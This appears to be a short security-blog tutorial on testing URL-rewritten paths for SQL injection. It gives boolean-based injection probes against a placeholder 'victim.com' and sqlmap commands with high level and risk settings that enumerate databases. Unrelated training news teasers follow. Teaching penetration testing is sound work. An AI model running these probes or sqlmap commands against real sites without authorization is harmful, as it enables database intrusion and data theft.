First of all, what is URL rewrite?You've likely seen sites with this schema in URLs: https://victim.com/?id=1Most everyone knows how to test for SQL injection in this situation ---> http://mysite.com/?id=1' or http://mysite.com/?id=1 and 2.5=2.5 or http://mysite.com/?id=1 and 3.4=3.5and etc.But, in URL rewrites, this UR http://victim.com/?id=1 will become http://victim.com/1 ,{id is hidden and the parameter 1 is used in url}For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :http://victim.com/1' or http://victim.com/1 and 3.6=3.6http://victim.com/1 and 3.6=3.77and etc.The results would be the same as a normal post parameter.For testing SQL injection with SQLMAP, we just use a star in the format. For instance:sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbsorsqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbsFor injecting in the content parameter, the star sign shows sqlmap where to inject payloads. Happy Hacking
News & Events
October 2, 2024
October is Cybersecurity Awareness Month, Why Cybersecurity Training is More Critical Than Ever
October is Cybersecurity Awareness Month 2024, so Cybrary is addressing why is cybersecurity training is more critical than ever. During October 2024 Cybersecurity Awareness Month, it’s time to recognize the value that regular, up-to-date training brings to both individuals and organizations
Building a Security Team
September 27, 2024
Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It
A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.